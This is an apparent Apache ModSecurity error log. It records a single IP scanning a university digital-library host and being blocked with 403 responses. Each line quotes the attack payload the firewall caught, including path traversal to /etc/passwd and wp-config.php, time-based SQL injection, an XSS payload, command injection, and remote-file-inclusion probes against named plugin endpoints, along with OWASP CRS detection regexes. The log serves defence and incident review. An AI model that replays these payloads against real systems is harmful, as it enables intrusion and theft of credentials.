[Tue Aug 29 11:42:57.397652 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAARpg3cAAAAU"]
[Tue Aug 29 11:42:59.380196 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAc3600AAAAO"]
[Tue Aug 29 11:43:00.429680 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAcoNl0AAAAF"]
[Tue Aug 29 11:43:00.443154 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAc@ca8AAAAL"]
[Tue Aug 29 11:43:00.477515 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAc@cbAAAAAL"]
[Tue Aug 29 11:43:02.437665 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13VsCo-f0AAAdECc0AAAAW"]
[Tue Aug 29 11:43:03.402416 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAdECc8AAAAW"]
[Tue Aug 29 11:43:04.446967 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAbo-gIAAAAi"]
[Tue Aug 29 11:43:04.470673 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAbo-gMAAAAi"]
[Tue Aug 29 11:43:06.413587 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAcsLI8AAAAE"]
[Tue Aug 29 11:43:07.690815 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAAdftVsAAAAG"]
[Tue Aug 29 11:43:08.060790 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAd9UO4AAAAr"]
[Tue Aug 29 11:43:08.617391 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAeYb0kAAAAB"]
[Tue Aug 29 11:43:09.372135 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAevkRMAAAAA"]
[Tue Aug 29 11:43:10.400522 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAdECdsAAAAW"]
[Tue Aug 29 11:43:11.454745 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAActbOoAAAAH"]
[Tue Aug 29 11:43:14.533009 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAdb7oQAAAAb"]
[Tue Aug 29 11:43:15.624311 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAdSZSAAAAAX"]
[Tue Aug 29 11:43:18.411708 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAdTBFcAAAAY"]
[Tue Aug 29 11:43:18.420616 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAdQ3mgAAAAV"]
[Tue Aug 29 11:43:20.360300 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAcsLLAAAAAE"]
[Tue Aug 29 11:43:21.435859 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAc9228AAAAD"]
[Tue Aug 29 11:43:21.560947 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAdTBGQAAAAY"]
[Tue Aug 29 11:43:23.424554 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAenGYQAAAAM"]
[Tue Aug 29 11:43:25.399794 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:token: {{token}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO13bcCo-f0AAAdeQ4AAAAAQ"]
[Tue Aug 29 11:43:27.615359 2023] [:error] [pid 1984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAAfAOZsAAAAH"]
[Tue Aug 29 11:43:28.526930 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAcvBpUAAAAJ"]
[Tue Aug 29 11:43:29.459980 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAdeQ48AAAAQ"]
[Tue Aug 29 11:43:30.430701 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13csCo-f0AAAfBLywAAAAI"]
[Tue Aug 29 11:43:31.388979 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAdftZgAAAAG"]
[Tue Aug 29 11:43:36.376651 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAfBLz4AAAAI"]
[Tue Aug 29 11:43:37.445258 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAeAW9YAAAAu"]
